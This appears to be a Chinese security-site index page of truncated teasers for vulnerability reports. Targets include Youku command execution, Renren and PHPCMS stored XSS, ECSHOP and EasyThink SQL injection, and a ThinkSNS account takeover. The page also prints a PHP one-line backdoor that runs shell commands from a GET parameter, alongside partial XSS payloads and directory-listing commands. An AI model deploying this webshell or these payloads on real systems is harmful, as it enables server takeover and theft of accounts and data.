优酷某分站命令执行漏洞(已证明可内网渗透) -关注热度:9

优酷某分站命令执行漏洞可SHELL，可内网渗透Target: http: channel 3g youku com ykmks login doWhoami: rootWebPath: opt www ykmks webapps ykmksOS Name: LinuxOS Version: 2 6 18-194 el5Java Home:..[详情]

for命令跨目录 读文件 写文件 - 网站安全 - 自学关注热度:11

c for d %i in (D: VirtualHost 8090sec www *) do @echo %i 列目录 c for r D: VirtualHost 8090sec www %i in (* *) do @echo %i 浏览目录 c for f %c in (D: VirtualHo..[详情]

防止.NET木马列所有站物理路径，aspxspy木马简单防关注热度:25

aspxspy 此木马是一个 NET程序制作，如果你的服务器支持 NET那就要注意了，进入木马有个功能叫：IIS Spy，点击以后可以看到所有站点所在的物理路径。以前有很多人提出过，但一直没有人..[详情]

ThinkSNS修改任意账号用户名和密码（包括管理员）关注热度:21

由于某处修改未做判断，导致直接可以修改用户账号信息(包括管理员)更换邮箱激活-修改任何uid的邮箱-登陆-使用修改的那个邮箱找回密码由于index php?app=publicmod=Registeract=changeActivationE..[详情]

PHPCMS最新版存储型xss（附多种利用方法） - 网站关注热度:24

PHPCMS文章投稿处存在存储型的XSS漏洞,也许当你看到标题的时候,你心里会想：楼主简直太不厚道了,不就一个XSS嘛,标题却来个代码执行 别慌,一个漏洞所造成的威胁,本人觉得并不在于其本..[详情]

撞库攻击：一场需要用户参与的持久攻防战 - 网关注热度:20

一、背景：用户数据泄露一直是如今互联网世界的一个焦点，从最近的京东撞库抹黑事件，到之前的CSDN，如家用户数据的泄露，服务商和黑客之间在用户数据这个舞台上一直在进行着旷..[详情]

人人网某分站存储型xss第二弹 - 网站安全 - 自学关注热度:29

存储型xss，可打cookie，引用某牛的话勿头痛医头脚痛医脚详细说明：http: dellcqg renren com Qa ask 单引号被转义构造img src=1 onerror=document body appendChild(document createElement(String fromCh..[详情]

洽洽食品某系统IIS配置不当导致任意代码执行关注热度:16

IIS配置不当致使任意代码执行，旗下多站沦陷，上市公司大量采购、财务数据可查其实问题很简单1 WEB服务器扩展里设置WebDAV为允许2 网站权限配置里开启了写入权限http: iservice qiaqiafoo..[详情]

PHP网站常见安全漏洞和防范措施总结 - 网站安全关注热度:11

目前，基于PHP的网站开发已经成为目前网站开发的主流，本文笔者重点从PHP网站攻击与安全防范方面进行探究，旨在减少网站漏洞，希望对大家有所帮助!一、常见PHP网站安全漏洞对于..[详情]

易想团购开源版#sql注入两个 - 网站安全 - 自学关注热度:13

http: 127 0 0 1 easethink message php?act=if($_REQUEST[ 39;act 39;] == 39;add 39;){if(!$user_info){showErr($GLOBALS[ 39;lang 39;][ 39;PLEASE_LOGIN_FIRST 39;]);}if($_REQUEST[ 39;conten..[详情]

ECSHOP 后台sql注入漏洞2枚（鸡肋） - 网站安全 -关注热度:29

admin affiliate_ck phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ $logdb = get_affiliate_ck(); $smarty-assign( 39;full_page 39;, 1); $smarty-assign( 39;ur_he..[详情]

建站之星(sitestar)最新版后台GETSHELL - 网站安全关注热度:14

建站之星(sitestar)最新版后台GETSHELL，修改任意文件名。非解析漏洞，利用自带编辑器重命名功能编辑器里选本地上传随意上传一图片木马。选择图片空间。20131211092219_24293 jpg是我刚刚上..[详情]

startbbs开源论坛存储型xss可盲打管理员 - 网站安全关注热度:10

startbbs某处对用户输出过滤不当导致存储型xssstartbbs 采用mvc架构设计。但是在对用户个人资料输入输出过滤不当，导致跨站脚本攻击。1、目标定位在：多个用户可以输入的地方，我拿个..[详情]

易思ESPCMS设计缺陷可登录任意账号 - 网站安全关注热度:11

易思ESPCMS某处设计缺陷（验证过弱）可登录任意用户账号易思ESPCMS cookie存在设计缺陷我看下cookie都有哪些参数ecisp_home_seccodeecisp_member_usernameecisp_member_infofunction member_cookieview($keywo..[详情]

介绍一个奇特的PHP一句话后门 - 网站安全 - 自学关注热度:11

?php *@example http: www myhack58 com shell php?exec=dir@by LUC Team* @print_r(`{$_GET[ 39;exec 39;]}`); 或echo(`{$_GET[ 39;exec 39;]}`);? 当某种情况下众多变异后门均被过滤时，您可尝试一..[详情]